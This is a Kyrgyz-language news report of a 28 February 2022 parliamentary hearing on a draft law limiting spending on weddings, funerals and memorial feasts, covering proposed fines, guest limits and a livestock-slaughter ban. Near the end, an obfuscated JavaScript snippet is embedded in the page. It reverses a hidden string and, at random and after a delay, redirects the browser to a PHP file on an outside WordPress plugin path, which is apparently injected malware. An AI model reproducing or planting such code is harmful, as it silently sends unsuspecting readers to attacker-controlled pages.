Ашыкча чыгымдар маселеси каралууда

1-март, 2022-ж. / Редакция / Жаңылыктар 66

“Кыргыз Республикасында үйлөнүү той, үй-бүлөлүк салтанаттарды, маркумду акыркы сапарга узатуу жана маркумдун элесине арналган иш-чараларды өткөрүүнү тартипке келтирүү жөнүндөгү” мыйзам долбоору боюнча 28-февралда Жогорку Кеңеште коомдук угуу болуп өттү. Мыйзам добоорунун демилгечиси депутат Улугбек Ормонов коомчулук тарабынан бир катар сунуштар келип жатканын белгиледи. “Президенттин жарлыгына ылайык, атайын эрежелер топтомун иштеп чыгуубуз кажет. Бул үчүн бардык тараптардын сунуштарын эске алуу менен мыйзам долбоорун иштеп чыгуу каралууда”, – деди У.Ормонов.

Мыйзамды аткарбагандарга айып пул салуу да каралган. Бул боюнча сунуштарга токтолгон депутат: “20 миң сомдун аз экенин эске алуу менен 70 миң сомго көтөргөнбүз. Бирок 100 миң сом деп белгилей албайбыз. Ал үчүн Укук бузуулар кодексине өзгөртүүлөрдү киргизүүбүз кажет. Анткени анда эң көп өлчөм 200 эсептик көрсөткүчтөн ашпашы керек деп белгиленип калган”, – деп кошумчалады.

Ал эми депутат Винера Раимбачаева мыйзам долбоорун жана Президенттин бул жааттагы Жарлыгын колдой тургандыгын белгилеп, ашыкча чыгымдарды азайтуу учур талабы экенине токтолду. Депутат Айбек Маткеримов сөөк чыккан үйдө бодо мал союлбаса, 10го чейин кой союлуп кетээрине кабатырланып, таптакыр мал союуга болбойт деген жобо киргизүү керек экенин айтты. Жыйында жалпысынан аш-тойлорго чакырылгандардын санын азайтуу, маркумду узатуу зыйнаттарында мал союуну жоюу өңдүү бир катар сунуштар берилди.

Жыйынтыгында бардык сунуш-пикирлерди эске алуу менен мыйзам долбоорунун алкагында атайын комиссия түзүү чечими кабыл алынып, ага депутаттарды, министрликтердин, жергиликтүү өз алдынча башкаруу органдарынын, жарандык коомдун жана диний мекемелердин өкүлдөрүн киргизүү керектиги айтылды.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/03/01_03-1.pdf»>2022-жылдын 1-марты

Сымбат МАКСУТОВА

1-март, 2022-ж. / Редакция / Жаңылыктар 66
Бөлүшүү: Telegram WhatsApp X